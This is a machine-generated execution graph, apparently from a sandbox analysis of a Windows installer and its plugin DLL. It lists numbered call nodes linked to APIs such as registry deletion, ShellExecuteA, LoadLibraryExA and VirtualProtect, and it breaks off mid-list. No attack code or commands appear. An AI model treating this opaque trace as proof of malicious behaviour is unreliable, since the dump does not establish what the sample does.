                                                            execution_graph 4833 10001000 4836 1000101b 4833->4836 4843 100014d8 4836->4843 4838 10001020 4839 10001024 4838->4839 4840 10001027 GlobalAlloc 4838->4840 4841 100014ff 3 API calls 4839->4841 4840->4839 4842 10001019 4841->4842 4844 1000123b 3 API calls 4843->4844 4845 100014de 4844->4845 4846 100014e4 4845->4846 4847 100014f0 GlobalFree 4845->4847 4846->4838 4847->4838 4848 4022c0 4849 4022f0 4848->4849 4850 4022c5 4848->4850 4852 4029fd 18 API calls 4849->4852 4851 402b07 19 API calls 4850->4851 4853 4022cc 4851->4853 4854 4022f7 4852->4854 4855 4029fd 18 API calls 4853->4855 4858 40230d 4853->4858 4859 402a3d RegOpenKeyExA 4854->4859 4856 4022dd RegDeleteValueA RegCloseKey 4855->4856 4856->4858 4862 402a68 4859->4862 4867 402ab4 4859->4867 4860 402a8e RegEnumKeyA 4861 402aa0 RegCloseKey 4860->4861 4860->4862 4864 406009 3 API calls 4861->4864 4862->4860 4862->4861 4863 402ac5 RegCloseKey 4862->4863 4865 402a3d 3 API calls 4862->4865 4863->4867 4866 402ab0 4864->4866 4865->4862 4866->4867 4868 402ae0 RegDeleteKeyA 4866->4868 4867->4858 4868->4867 4869 4019c0 4870 4029fd 18 API calls 4869->4870 4871 4019c7 4870->4871 4872 4029fd 18 API calls 4871->4872 4873 4019d0 4872->4873 4874 4019d7 lstrcmpiA 4873->4874 4875 4019e9 lstrcmpA 4873->4875 4876 4019dd 4874->4876 4875->4876 4884 402b42 4885 402b51 SetTimer 4884->4885 4886 402b6a 4884->4886 4885->4886 4887 402bb8 4886->4887 4888 402bbe MulDiv 4886->4888 4889 402b78 wsprintfA SetWindowTextA SetDlgItemTextA 4888->4889 4889->4887 4891 4043c3 4892 4043d3 4891->4892 4893 4043f9 4891->4893 4895 403fcc 19 API calls 4892->4895 4894 404033 8 API calls 4893->4894 4896 404405 4894->4896 4897 4043e0 SetDlgItemTextA 4895->4897 4897->4893 4898 402645 4899 4029fd 18 API calls 4898->4899 4900 40264c FindFirstFileA 4899->4900 4901 40266f 4900->4901 4905 40265f 4900->4905 4906 405c3c wsprintfA 4901->4906 4903 402676 4907 405cde lstrcpynA 4903->4907 4906->4903 4907->4905 4908 404946 GetDlgItem GetDlgItem 4909 404998 7 API calls 4908->4909 4921 404bb0 4908->4921 4910 404a3b DeleteObject 4909->4910 4911 404a2e SendMessageA 4909->4911 4912 404a44 4910->4912 4911->4910 4914 404a7b 4912->4914 4915 405d00 18 API calls 4912->4915 4913 404c94 4917 404d40 4913->4917 4923 404ba3 4913->4923 4928 404ced SendMessageA 4913->4928 4916 403fcc 19 API calls 4914->4916 4918 404a5d SendMessageA SendMessageA 4915->4918 4922 404a8f 4916->4922 4919 404d52 4917->4919 4920 404d4a SendMessageA 4917->4920 4918->4912 4930 404d64 ImageList_Destroy 4919->4930 4931 404d6b 4919->4931 4939 404d7b 4919->4939 4920->4919 4921->4913 4942 404c21 4921->4942 4961 404894 SendMessageA 4921->4961 4927 403fcc 19 API calls 4922->4927 4924 404033 8 API calls 4923->4924 4929 404f36 4924->4929 4925 404c86 SendMessageA 4925->4913 4943 404a9d 4927->4943 4928->4923 4933 404d02 SendMessageA 4928->4933 4930->4931 4934 404d74 GlobalFree 4931->4934 4931->4939 4932 404eea 4932->4923 4937 404efc ShowWindow GetDlgItem ShowWindow 4932->4937 4936 404d15 4933->4936 4934->4939 4935 404b71 GetWindowLongA SetWindowLongA 4938 404b8a 4935->4938 4944 404d26 SendMessageA 4936->4944 4937->4923 4940 404b90 ShowWindow 4938->4940 4941 404ba8 4938->4941 4939->4932 4952 404db6 4939->4952 4966 404914 4939->4966 4959 404001 SendMessageA 4940->4959 4960 404001 SendMessageA 4941->4960 4942->4913 4942->4925 4943->4935 4945 404b6b 4943->4945 4948 404aec SendMessageA 4943->4948 4949 404b28 SendMessageA 4943->4949 4950 404b39 SendMessageA 4943->4950 4944->4917 4945->4935 4945->4938 4948->4943 4949->4943 4950->4943 4954 404dfa 4952->4954 4955 404de4 SendMessageA 4952->4955 4953 404ec0 InvalidateRect 4953->4932 4956 404ed6 4953->4956 4954->4953 4958 404e6e SendMessageA SendMessageA 4954->4958 4955->4954 4975 4047b2 4956->4975 4958->4954 4959->4923 4960->4921 4962 4048f3 SendMessageA 4961->4962 4963 4048b7 GetMessagePos ScreenToClient SendMessageA 4961->4963 4965 4048eb 4962->4965 4964 4048f0 4963->4964 4963->4965 4964->4962 4965->4942 4983 405cde lstrcpynA 4966->4983 4968 404927 4984 405c3c wsprintfA 4968->4984 4970 404931 4971 40140b 2 API calls 4970->4971 4972 40493a 4971->4972 4985 405cde lstrcpynA 4972->4985 4974 404941 4974->4952 4976 4047cc 4975->4976 4977 405d00 18 API calls 4976->4977 4978 404801 4977->4978 4979 405d00 18 API calls 4978->4979 4980 40480c 4979->4980 4981 405d00 18 API calls 4980->4981 4982 40483d lstrlenA wsprintfA SetDlgItemTextA 4981->4982 4982->4932 4983->4968 4984->4970 4985->4974 3996 4023c8 4007 402b07 3996->4007 3998 4023d2 4011 4029fd 3998->4011 4001 4023e5 RegQueryValueExA 4002 40240b RegCloseKey 4001->4002 4003 402405 4001->4003 4006 402663 4002->4006 4003->4002 4017 405c3c wsprintfA 4003->4017 4008 4029fd 18 API calls 4007->4008 4009 402b20 4008->4009 4010 402b2e RegOpenKeyExA 4009->4010 4010->3998 4012 402a09 4011->4012 4013 405d00 18 API calls 4012->4013 4014 402a2a 4013->4014 4015 4023db 4014->4015 4016 405f49 5 API calls 4014->4016 4015->4001 4015->4006 4016->4015 4017->4002 4989 401ccc GetDlgItem GetClientRect 4990 4029fd 18 API calls 4989->4990 4991 401cfc LoadImageA SendMessageA 4990->4991 4992 402892 4991->4992 4993 401d1a DeleteObject 4991->4993 4993->4992 4994 40474c 4995 404778 4994->4995 4996 40475c 4994->4996 4998 4047ab 4995->4998 4999 40477e SHGetPathFromIDListA 4995->4999 5005 4054d6 GetDlgItemTextA 4996->5005 5001 40478e 4999->5001 5004 404795 SendMessageA 4999->5004 5000 404769 SendMessageA 5000->4995 5002 40140b 2 API calls 5001->5002 5002->5004 5004->4998 5005->5000 5006 4024d1 5007 4024d6 5006->5007 5008 4024e7 5006->5008 5009 4029e0 18 API calls 5007->5009 5010 4029fd 18 API calls 5008->5010 5012 4024dd 5009->5012 5011 4024ee lstrlenA 5010->5011 5011->5012 5013 40250d WriteFile 5012->5013 5014 402663 5012->5014 5013->5014 4232 4025d3 4233 4025da 4232->4233 4236 40283f 4232->4236 4234 4029e0 18 API calls 4233->4234 4235 4025e5 4234->4235 4237 4025ec SetFilePointer 4235->4237 4237->4236 4238 4025fc 4237->4238 4240 405c3c wsprintfA 4238->4240 4240->4236 4270 4014d6 4271 4029e0 18 API calls 4270->4271 4272 4014dc Sleep 4271->4272 4274 402892 4272->4274 5022 401dd8 5023 4029fd 18 API calls 5022->5023 5024 401dde 5023->5024 5025 4029fd 18 API calls 5024->5025 5026 401de7 5025->5026 5027 4029fd 18 API calls 5026->5027 5028 401df0 5027->5028 5029 4029fd 18 API calls 5028->5029 5030 401df9 5029->5030 5031 401423 25 API calls 5030->5031 5032 401e00 ShellExecuteA 5031->5032 5033 401e2d 5032->5033 5034 40155b 5035 401577 ShowWindow 5034->5035 5036 40157e 5034->5036 5035->5036 5037 402892 5036->5037 5038 40158c ShowWindow 5036->5038 5038->5037 5039 401edc 5040 4029fd 18 API calls 5039->5040 5041 401ee3 GetFileVersionInfoSizeA 5040->5041 5042 401f06 GlobalAlloc 5041->5042 5044 401f5c 5041->5044 5043 401f1a GetFileVersionInfoA 5042->5043 5042->5044 5043->5044 5045 401f2b VerQueryValueA 5043->5045 5045->5044 5046 401f44 5045->5046 5050 405c3c wsprintfA 5046->5050 5048 401f50 5051 405c3c wsprintfA 5048->5051 5050->5048 5051->5044 5052 4040e0 lstrcpynA lstrlenA 5058 4018e3 5059 40191a 5058->5059 5060 4029fd 18 API calls 5059->5060 5061 40191f 5060->5061 5062 40559e 71 API calls 5061->5062 5063 401928 5062->5063 3860 10002724 3861 10002774 3860->3861 3862 10002734 VirtualProtect 3860->3862 3862->3861 5064 4018e6 5065 4029fd 18 API calls 5064->5065 5066 4018ed 5065->5066 5067 4054f2 MessageBoxIndirectA 5066->5067 5068 4018f6 5067->5068 4018 401f68 4019 401f7a 4018->4019 4020 402028 4018->4020 4021 4029fd 18 API calls 4019->4021 4023 401423 25 API calls 4020->4023 4022 401f81 4021->4022 4024 4029fd 18 API calls 4022->4024 4029 402181 4023->4029 4025 401f8a 4024->4025 4026 401f92 GetModuleHandleA 4025->4026 4027 401f9f LoadLibraryExA 4025->4027 4026->4027 4028 401faf GetProcAddress 4026->4028 4027->4020 4027->4028 4030 401ffb 4028->4030 4031 401fbe 4028->4031 4032 404fc9 25 API calls 4030->4032 4033 401fc6 4031->4033 4034 401fdd 4031->4034 4035 401fce 4032->4035 4082 401423 4033->4082 4039 100016da 4034->4039 4035->4029 4037 40201c FreeLibrary 4035->4037 4037->4029 4040 1000170a 4039->4040 4085 10001a86 4040->4085 4042 10001711 4043 10001827 4042->4043 4044 10001722 4042->4044 4045 10001729 4042->4045 4043->4035 4137 100021ce 4044->4137 4119 10002218 4045->4119 4050 1000178d 4054 10001793 4050->4054 4055 100017cf 4050->4055 4051 1000176f 4150 100023d6 4051->4150 4052 10001758 4056 1000175d 4052->4056 4066 1000174e 4052->4066 4053 1000173f 4058 10001745 4053->4058 4059 10001750 4053->4059 4061 10001576 3 API calls 4054->4061 4063 100023d6 13 API calls 4055->4063 4147 10002abb 4056->4147 4058->4066 4131 10002800 4058->4131 4141 100025a2 4059->4141 4068 100017a9 4061->4068 4069 100017c1 4063->4069 4066->4050 4066->4051 4071 100023d6 13 API calls 4068->4071 4072 100017d6 4069->4072 4071->4069 4081 10001816 4072->4081 4173 1000239c 4072->4173 4075 10001820 GlobalFree 4075->4043 4078 10001802 4078->4081 4177 100014ff wsprintfA 4078->4177 4079 100017fb FreeLibrary 4079->4078 4081->4043 4081->4075 4083 404fc9 25 API calls 4082->4083 4084 401431 4083->4084 4084->4035 4180 10001215 GlobalAlloc 4085->4180 4087 10001aaa 4181 10001215 GlobalAlloc 4087->4181 4089 10001ab5 4182 1000123b 4089->4182 4091 10001ce4 GlobalFree GlobalFree GlobalFree 4093 10001d01 4091->4093 4103 10001d4b 4091->4103 4092 10001abd 4092->4091 4095 10001b89 GlobalAlloc 4092->4095 4097 10001bf2 GlobalFree 4092->4097 4100 10001bd4 lstrcpyA 4092->4100 4101 10001bde lstrcpyA 4092->4101 4092->4103 4108 10001f9c 4092->4108 4113 10001c30 4092->4113 4114 10001e97 GlobalFree 4092->4114 4117 10001224 2 API calls 4092->4117 4192 10001215 GlobalAlloc 4092->4192 4094 1000203c 4093->4094 4093->4103 4104 10001d16 4093->4104 4096 1000205e GetModuleHandleA 4094->4096 4094->4103 4095->4092 4098 10002084 4096->4098 4099 1000206f LoadLibraryA 4096->4099 4097->4092 4193 100015c1 GetProcAddress 4098->4193 4099->4098 4099->4103 4100->4101 4101->4092 4103->4042 4104->4103 4189 10001224 4104->4189 4105 100020d5 4105->4103 4106 100020e2 lstrlenA 4105->4106 4194 100015c1 GetProcAddress 4106->4194 4108->4103 4111 10001fe0 lstrcpyA 4108->4111 4111->4103 4112 10002096 4112->4105 4118 100020bf GetProcAddress 4112->4118 4113->4092 4187 10001551 GlobalSize GlobalAlloc 4113->4187 4114->4092 4115 100020fb 4115->4103 4117->4092 4118->4105 4125 10002230 4119->4125 4120 10001224 GlobalAlloc lstrcpynA 4120->4125 4121 1000123b 3 API calls 4121->4125 4123 10002365 GlobalFree 4124 1000172f 4123->4124 4123->4125 4124->4052 4124->4053 4124->4066 4125->4120 4125->4121 4125->4123 4126 100022ed GlobalAlloc MultiByteToWideChar 4125->4126 4128 100022cc lstrlenA 4125->4128 4197 100012bf 4125->4197 4127 10002317 GlobalAlloc CLSIDFromString GlobalFree 4126->4127 4129 100022db 4126->4129 4127->4123 4128->4123 4128->4129 4129->4123 4202 10002536 4129->4202 4133 10002812 4131->4133 4132 100028b7 SetFilePointer 4134 100028d5 4132->4134 4133->4132 4135 100029d1 4134->4135 4136 100029c6 GetLastError 4134->4136 4135->4066 4136->4135 4138 100021de 4137->4138 4140 10001728 4137->4140 4139 100021f0 GlobalAlloc 4138->4139 4138->4140 4139->4138 4140->4045 4145 100025be 4141->4145 4142 10002622 4144 10002627 GlobalSize 4142->4144 4146 10002631 4142->4146 4143 1000260f GlobalAlloc 4143->4146 4144->4146 4145->4142 4145->4143 4146->4066 4148 10002ac6 4147->4148 4149 10002b06 GlobalFree 4148->4149 4153 100023f1 4150->4153 4152 10002437 wsprintfA 4152->4153 4153->4152 4154 10002518 GlobalFree 4153->4154 4155 100024af lstrcpynA 4153->4155 4156 100024ef GlobalFree 4153->4156 4158 1000248c WideCharToMultiByte 4153->4158 4159 10001278 2 API calls 4153->4159 4160 1000244b GlobalAlloc StringFromGUID2 WideCharToMultiByte GlobalFree 4153->4160 4205 10001215 GlobalAlloc 4153->4205 4206 100012e8 4153->4206 4154->4153 4157 10001775 4154->4157 4155->4153 4156->4153 4162 10001576 4157->4162 4158->4153 4159->4153 4160->4153 4210 10001215 GlobalAlloc 4162->4210 4164 1000157c 4165 10001589 lstrcpyA 4164->4165 4167 100015a3 4164->4167 4168 100015bd 4165->4168 4167->4168 4169 100015a8 wsprintfA 4167->4169 4170 10001278 4168->4170 4169->4168 4171 10001281 GlobalAlloc lstrcpynA 4170->4171 4172 100012ba GlobalFree 4170->4172 4171->4172 4172->4072 4174 100023aa 4173->4174 4176 100017e2 4173->4176 4175 100023c3 GlobalFree 4174->4175 4174->4176 4175->4174 4176->4078 4176->4079 4178 10001278 2 API calls 4177->4178 4179 10001520 4178->4179 4179->4081 4180->4087 4181->4089 4183 10001274 4182->4183 4184 10001245 4182->4184 4183->4092 4184->4183 4195 10001215 GlobalAlloc 4184->4195 4186 10001251 lstrcpyA GlobalFree 4186->4092 4188 1000156f 4187->4188 4188->4113 4196 10001215 GlobalAlloc 4189->4196 4191 10001233 lstrcpynA 4191->4103 4192->4092 4193->4112 4194->4115 4195->4186 4196->4191 4198 100012e3 4197->4198 4199 100012c7 4197->4199 4198->4198 4199->4198 4200 10001224 2 API calls 4199->4200 4201 100012e1 4200->4201 4201->4125 4203 10002544 VirtualAlloc 4202->4203 4204 1000259a 4202->4204 4203->4204 4204->4129 4205->4153 4207 100012f1 4206->4207 4208 10001316 4206->4208 4207->4208 4209 100012fd lstrcpyA 4207->4209 4208->4153 4209->4208 4210->4164 5069 1000182a 5070 1000123b 3 API calls 5069->5070 5071 10001850 5070->5071 5072 1000123b 3 API calls 5071->5072 5073 10001858 5072->5073 5074 1000123b 3 API calls 5073->5074 5077 10001895 5073->5077 5075 1000187a 5074->5075 5076 10001883 GlobalFree 5075->5076 5076->5077 5078 10001278 2 API calls 5077->5078 5079 10001a0c GlobalFree GlobalFree 5078->5079 5080 40286d SendMessageA 5081 402887 InvalidateRect 5080->5081 5082 402892 5080->5082 5081->5082 5097 4014f0 SetForegroundWindow 5098 402892 5097->5098 5099 401af0 5100 4029fd 18 API calls 5099->5100 5101 401af7 5100->5101 5102 4029e0 18 API calls 5101->5102 5103 401b00 wsprintfA 5102->5103 5104 402892 5103->5104 5105 4019f1 5106 4029fd 18 API calls 5105->5106 5107 4019fa ExpandEnvironmentStringsA 5106->5107 5108 401a0e 5107->5108 5110 401a21 5107->5110 5109 401a13 lstrcmpA 5108->5109 5108->5110 5109->5110 5118 10001637 5119 10001666 5118->5119 5120 10001a86 20 API calls 5119->5120 5121 1000166d 5120->5121 5122 10001680 5121->5122 5123 10001674 5121->5123 5125 100016a7 5122->5125 5126 1000168a 5122->5126 5124 10001278 2 API calls 5123->5124 5129 1000167e 5124->5129 5127 100016d1 5125->5127 5128 100016ad 5125->5128 5130 100014ff 3 API calls 5126->5130 5132 100014ff 3 API calls 5127->5132 5131 10001576 3 API calls 5128->5131 5133 1000168f 5130->5133 5134 100016b2 5131->5134 5132->5129 5135 10001576 3 API calls 5133->5135 5136 10001278 2 API calls 5134->5136 5137 10001695 5135->5137 5138 100016b8 GlobalFree 5136->5138 5139 10001278 2 API calls 5137->5139 5138->5129 5140 100016cc GlobalFree 5138->5140 5141 1000169b GlobalFree 5139->5141 5140->5129 5141->5129 5142 401c78 5143 4029e0 18 API calls 5142->5143 5144 401c7e IsWindow 5143->5144 5145 4019e1 5144->5145 4675 403af9 4676 403b11 4675->4676 4677 403c4c 4675->4677 4676->4677 4678 403b1d 4676->4678 4679 403c5d GetDlgItem GetDlgItem 4677->4679 4680 403c9d 4677->4680 4682 403b28 SetWindowPos 4678->4682 4683 403b3b 4678->4683 4684 403fcc 19 API calls 4679->4684 4681 403cf7 4680->4681 4689 401389 2 API calls 4680->4689 4685 404018 SendMessageA 4681->4685 4690 403c47 4681->4690 4682->4683 4686 403b40 ShowWindow 4683->4686 4687 403b58 4683->4687 4688 403c87 SetClassLongA 4684->4688 4713 403d09 4685->4713 4686->4687 4691 403b60 DestroyWindow 4687->4691 4692 403b7a 4687->4692 4693 40140b 2 API calls 4688->4693 4696 403ccf 4689->4696 4697 403f55 4691->4697 4694 403b90 4692->4694 4695 403b7f SetWindowLongA 4692->4695 4693->4680 4698 403c39 4694->4698 4699 403b9c GetDlgItem 4694->4699 4695->4690 4696->4681 4700 403cd3 SendMessageA 4696->4700 4697->4690 4706 403f86 ShowWindow 4697->4706 4705 404033 8 API calls 4698->4705 4703 403bcc 4699->4703 4704 403baf SendMessageA IsWindowEnabled 4699->4704 4700->4690 4701 40140b 2 API calls 4701->4713 4702 403f57 DestroyWindow EndDialog 4702->4697 4708 403bd9 4703->4708 4710 403c20 SendMessageA 4703->4710 4711 403bec 4703->4711 4720 403bd1 4703->4720 4704->4690 4704->4703 4705->4690 4706->4690 4707 405d00 18 API calls 4707->4713 4708->4710 4708->4720 4709 403fa5 SendMessageA 4712 403c07 4709->4712 4710->4698 4714 403bf4 4711->4714 4715 403c09 4711->4715 4712->4698 4713->4690 4713->4701 4713->4702 4713->4707 4716 403fcc 19 API calls 4713->4716 4721 403fcc 19 API calls 4713->4721 4736 403e97 DestroyWindow 4713->4736 4718 40140b 2 API calls 4714->4718 4717 40140b 2 API calls 4715->4717 4716->4713 4719 403c10 4717->4719 4718->4720 4719->4698 4719->4720 4720->4709 4722 403d84 GetDlgItem 4721->4722 4723 403da1 ShowWindow KiUserCallbackDispatcher 4722->4723 4724 403d99 4722->4724 4745 403fee KiUserCallbackDispatcher 4723->4745 4724->4723 4726 403dcb EnableWindow 4729 403ddf 4726->4729 4727 403de4 GetSystemMenu EnableMenuItem SendMessageA 4728 403e14 SendMessageA 4727->4728 4727->4729 4728->4729 4729->4727 4746 404001 SendMessageA 4729->4746 4747 405cde lstrcpynA 4729->4747 4732 403e42 lstrlenA 4733 405d00 18 API calls 4732->4733 4734 403e53 SetWindowTextA 4733->4734 4735 401389 2 API calls 4734->4735 4735->4713 4736->4697 4737 403eb1 CreateDialogParamA 4736->4737 4737->4697 4738 403ee4 4737->4738 4739 403fcc 19 API calls 4738->4739 4740 403eef GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4739->4740 4741 401389 2 API calls 4740->4741 4742 403f35 4741->4742 4742->4690 4743 403f3d ShowWindow 4742->4743 4744 404018 SendMessageA 4743->4744 4744->4697 4745->4726 4746->4729 4747->4732 5146 1000103d 5147 1000101b 8 API calls 5146->5147 5148 10001056 5147->5148 5149 4014fe 5150 401506 5149->5150 5152 401519 5149->5152 5151 4029e0 18 API calls 5150->5151 5151->5152 4785 40227f 4786 4029fd 18 API calls 4785->4786 4787 402290 4786->4787 4788 4029fd 18 API calls 4787->4788 4789 402299 4788->4789 4790 4029fd 18 API calls 4789->4790 4791 4022a3 GetPrivateProfileStringA 4790->4791 5153 401000 5154 401037 BeginPaint GetClientRect 5153->5154 5155 40100c DefWindowProcA 5153->5155 5157 4010f3 5154->5157 5158 401179 5155->5158 5159 401073 CreateBrushIndirect FillRect DeleteObject 5157->5159 5160 4010fc 5157->5160 5159->5157 5161 401102 CreateFontIndirectA 5160->5161 5162 401167 EndPaint 5160->5162 5161->5162 5163 401112 6 API calls 5161->5163 5162->5158 5163->5162 5164 402602 5165 402892 5164->5165 5166 402609 5164->5166 5167 40260f FindClose 5166->5167 5167->5165 5168 402683 5169 4029fd 18 API calls 5168->5169 5170 402691 5169->5170 5171 4026a7 5170->5171 5173 4029fd 18 API calls 5170->5173 5172 40594a 2 API calls 5171->5172 5174 4026ad 5172->5174 5173->5171 5194 40596f GetFileAttributesA CreateFileA 5174->5194 5176 4026ba 5177 402763 5176->5177 5178 4026c6 GlobalAlloc 5176->5178 5181 40276b DeleteFileA 5177->5181 5182 40277e 5177->5182 5179 40275a CloseHandle 5178->5179 5180 4026df 5178->5180 5179->5177 5195 4031cc SetFilePointer 5180->5195 5181->5182 5184 4026e5 5185 4031b6 ReadFile 5184->5185 5186 4026ee GlobalAlloc 5185->5186 5187 402732 WriteFile GlobalFree 5186->5187 5188 4026fe 5186->5188 5189 402f1f 46 API calls 5187->5189 5190 402f1f 46 API calls 5188->5190 5191 402757 5189->5191 5193 40270b 5190->5193 5191->5179 5192 402729 GlobalFree 5192->5187 5193->5192 5194->5176 5195->5184 5196 406604 5200 40613c 5196->5200 5197 406aa7 5198 4061c6 GlobalAlloc 5198->5197 5198->5200 5199 4061bd GlobalFree 5199->5198 5200->5197 5200->5198 5200->5199 5200->5200 5201 406234 GlobalFree 5200->5201 5202 40623d GlobalAlloc 5200->5202 5201->5202 5202->5197 5202->5200 5203 401705 5204 4029fd 18 API calls 5203->5204 5205 40170c SearchPathA 5204->5205 5206 401727 5205->5206 5207 4027bd 5205->5207 5206->5207 5209 405cde lstrcpynA 5206->5209 5209->5207 3863 405107 3864 4052b4 3863->3864 3865 405129 GetDlgItem GetDlgItem GetDlgItem 3863->3865 3867 4052e4 3864->3867 3868 4052bc GetDlgItem CreateThread CloseHandle 3864->3868 3909 404001 SendMessageA 3865->3909 3870 405312 3867->3870 3873 405333 3867->3873 3874 4052fa ShowWindow ShowWindow 3867->3874 3868->3867 3982 40509b OleInitialize 3868->3982 3869 40519a 3878 4051a1 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3869->3878 3871 40531a 3870->3871 3872 40536d 3870->3872 3875 405322 3871->3875 3876 405346 ShowWindow 3871->3876 3872->3873 3886 40537a SendMessageA 3872->3886 3918 404033 3873->3918 3914 404001 SendMessageA 3874->3914 3915 403fa5 3875->3915 3882 405366 3876->3882 3883 405358 3876->3883 3884 405210 3878->3884 3885 4051f4 SendMessageA SendMessageA 3878->3885 3881 40533f 3888 403fa5 SendMessageA 3882->3888 3932 404fc9 3883->3932 3889 405223 3884->3889 3890 405215 SendMessageA 3884->3890 3885->3884 3886->3881 3891 405393 CreatePopupMenu 3886->3891 3888->3872 3910 403fcc 3889->3910 3890->3889 3943 405d00 3891->3943 3895 405233 3898 405270 GetDlgItem SendMessageA 3895->3898 3899 40523c ShowWindow 3895->3899 3896 4053c1 GetWindowRect 3897 4053d4 TrackPopupMenu 3896->3897 3897->3881 3900 4053f0 3897->3900 3898->3881 3903 405297 SendMessageA SendMessageA 3898->3903 3901 405252 ShowWindow 3899->3901 3902 40525f 3899->3902 3904 40540f SendMessageA 3900->3904 3901->3902 3913 404001 SendMessageA 3902->3913 3903->3881 3904->3904 3905 40542c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3904->3905 3907 40544e SendMessageA 3905->3907 3907->3907 3908 405470 GlobalUnlock SetClipboardData CloseClipboard 3907->3908 3908->3881 3909->3869 3911 405d00 18 API calls 3910->3911 3912 403fd7 SetDlgItemTextA 3911->3912 3912->3895 3913->3898 3914->3870 3916 403fb2 SendMessageA 3915->3916 3917 403fac 3915->3917 3916->3873 3917->3916 3919 40404b GetWindowLongA 3918->3919 3929 4040d4 3918->3929 3920 40405c 3919->3920 3919->3929 3921 40406b GetSysColor 3920->3921 3922 40406e 3920->3922 3921->3922 3923 404074 SetTextColor 3922->3923 3924 40407e SetBkMode 3922->3924 3923->3924 3925 404096 GetSysColor 3924->3925 3926 40409c 3924->3926 3925->3926 3927 4040a3 SetBkColor 3926->3927 3928 4040ad 3926->3928 3927->3928 3928->3929 3930 4040c0 DeleteObject 3928->3930 3931 4040c7 CreateBrushIndirect 3928->3931 3929->3881 3930->3931 3931->3929 3933 404fe4 3932->3933 3942 405087 3932->3942 3934 405001 lstrlenA 3933->3934 3935 405d00 18 API calls 3933->3935 3936 40502a 3934->3936 3937 40500f lstrlenA 3934->3937 3935->3934 3939 405030 SetWindowTextA 3936->3939 3940 40503d 3936->3940 3938 405021 lstrcatA 3937->3938 3937->3942 3938->3936 3939->3940 3941 405043 SendMessageA SendMessageA SendMessageA 3940->3941 3940->3942 3941->3942 3942->3882 3955 405d0d 3943->3955 3944 405f30 3945 4053a3 AppendMenuA 3944->3945 3977 405cde lstrcpynA 3944->3977 3945->3896 3945->3897 3947 405dae GetVersion 3947->3955 3948 405f07 lstrlenA 3948->3955 3949 405d00 10 API calls 3949->3948 3952 405e26 GetSystemDirectoryA 3952->3955 3954 405e39 GetWindowsDirectoryA 3954->3955 3955->3944 3955->3947 3955->3948 3955->3949 3955->3952 3955->3954 3957 405d00 10 API calls 3955->3957 3958 405eb0 lstrcatA 3955->3958 3959 405e6d SHGetSpecialFolderLocation 3955->3959 3961 405bc5 RegOpenKeyExA 3955->3961 3966 405f49 3955->3966 3975 405c3c wsprintfA 3955->3975 3976 405cde lstrcpynA 3955->3976 3957->3955 3958->3955 3959->3955 3960 405e85 SHGetPathFromIDListA CoTaskMemFree 3959->3960 3960->3955 3962 405c36 3961->3962 3963 405bf8 RegQueryValueExA 3961->3963 3962->3955 3964 405c19 RegCloseKey 3963->3964 3964->3962 3973 405f55 3966->3973 3967 405fbd 3968 405fc1 CharPrevA 3967->3968 3971 405fdc 3967->3971 3968->3967 3969 405fb2 CharNextA 3969->3967 3969->3973 3971->3955 3972 405fa0 CharNextA 3972->3973 3973->3967 3973->3969 3973->3972 3974 405fad CharNextA 3973->3974 3978 405799 3973->3978 3974->3969 3975->3955 3976->3955 3977->3945 3979 40579f 3978->3979 3980 4057b2 3979->3980 3981 4057a5 CharNextA 3979->3981 3980->3973 3981->3979 3989 404018 3982->3989 3984 4050be 3988 4050e5 3984->3988 3992 401389 3984->3992 3985 404018 SendMessageA 3986 4050f7 OleUninitialize 3985->3986 3988->3985 3990 404030 3989->3990 3991 404021 SendMessageA 3989->3991 3990->3984 3991->3990 3994 401390 3992->3994 3993 4013fe 3993->3984 3994->3993 3995 4013cb MulDiv SendMessageA 3994->3995 3995->3994 5210 40440a 5211 404436 5210->5211 5212 404447 5210->5212 5271 4054d6 GetDlgItemTextA 5211->5271 5214 404453 GetDlgItem 5212->5214 5221 4044b2 5212->5221 5216 404467 5214->5216 5215 404441 5218 405f49 5 API calls 5215->5218 5219 40447b SetWindowTextA 5216->5219 5227 405807 4 API calls 5216->5227 5217 404596 5220 404731 5217->5220 5273 4054d6 GetDlgItemTextA 5217->5273 5218->5212 5223 403fcc 19 API calls 5219->5223 5226 404033 8 API calls 5220->5226 5221->5217 5221->5220 5224 405d00 18 API calls 5221->5224 5228 404497 5223->5228 5229 404526 SHBrowseForFolderA 5224->5229 5225 4045c6 5230 40585c 18 API calls 5225->5230 5231 404745 5226->5231 5232 404471 5227->5232 5233 403fcc 19 API calls 5228->5233 5229->5217 5234 40453e CoTaskMemFree 5229->5234 5235 4045cc 5230->5235 5232->5219 5238 40576e 3 API calls 5232->5238 5236 4044a5 5233->5236 5237 40576e 3 API calls 5234->5237 5274 405cde lstrcpynA 5235->5274 5272 404001 SendMessageA 5236->5272 5240 40454b 5237->5240 5238->5219 5243 404582 SetDlgItemTextA 5240->5243 5247 405d00 18 API calls 5240->5247 5242 4044ab 5245 406009 3 API calls 5242->5245 5243->5217 5244 4045e3 5246 406009 3 API calls 5244->5246 5245->5221 5254 4045eb 5246->5254 5248 40456a lstrcmpiA 5247->5248 5248->5243 5251 40457b lstrcatA 5248->5251 5249 404625 5275 405cde lstrcpynA 5249->5275 5251->5243 5252 40462c 5253 405807 4 API calls 5252->5253 5255 404632 GetDiskFreeSpaceA 5253->5255 5254->5249 5257 4057b5 2 API calls 5254->5257 5259 404676 5254->5259 5258 404654 MulDiv 5255->5258 5255->5259 5257->5254 5258->5259 5260 4046e0 5259->5260 5261 4047b2 21 API calls 5259->5261 5262 404703 5260->5262 5264 40140b 2 API calls 5260->5264 5263 4046d2 5261->5263 5276 403fee KiUserCallbackDispatcher 5262->5276 5266 4046e2 SetDlgItemTextA 5263->5266 5267 4046d7 5263->5267 5264->5262 5266->5260 5269 4047b2 21 API calls 5267->5269 5268 40471f 5268->5220 5277 40439f 5268->5277 5269->5260 5271->5215 5272->5242 5273->5225 5274->5244 5275->5252 5276->5268 5278 4043b2 SendMessageA 5277->5278 5279 4043ad 5277->5279 5278->5220 5279->5278 5280 40280a 5281 4029e0 18 API calls 5280->5281 5282 402810 5281->5282 5283 402841 5282->5283 5284 402663 5282->5284 5286 40281e 5282->5286 5283->5284 5285 405d00 18 API calls 5283->5285 5285->5284 5286->5284 5288 405c3c wsprintfA 5286->5288 5288->5284 5289 40218a 5290 4029fd 18 API calls 5289->5290 5291 402190 5290->5291 5292 4029fd 18 API calls 5291->5292 5293 402199 5292->5293 5294 4029fd 18 API calls 5293->5294 5295 4021a2 5294->5295 5296 405fe2 2 API calls 5295->5296 5297 4021ab 5296->5297 5298 4021bc lstrlenA lstrlenA 5297->5298 5299 4021af 5297->5299 5301 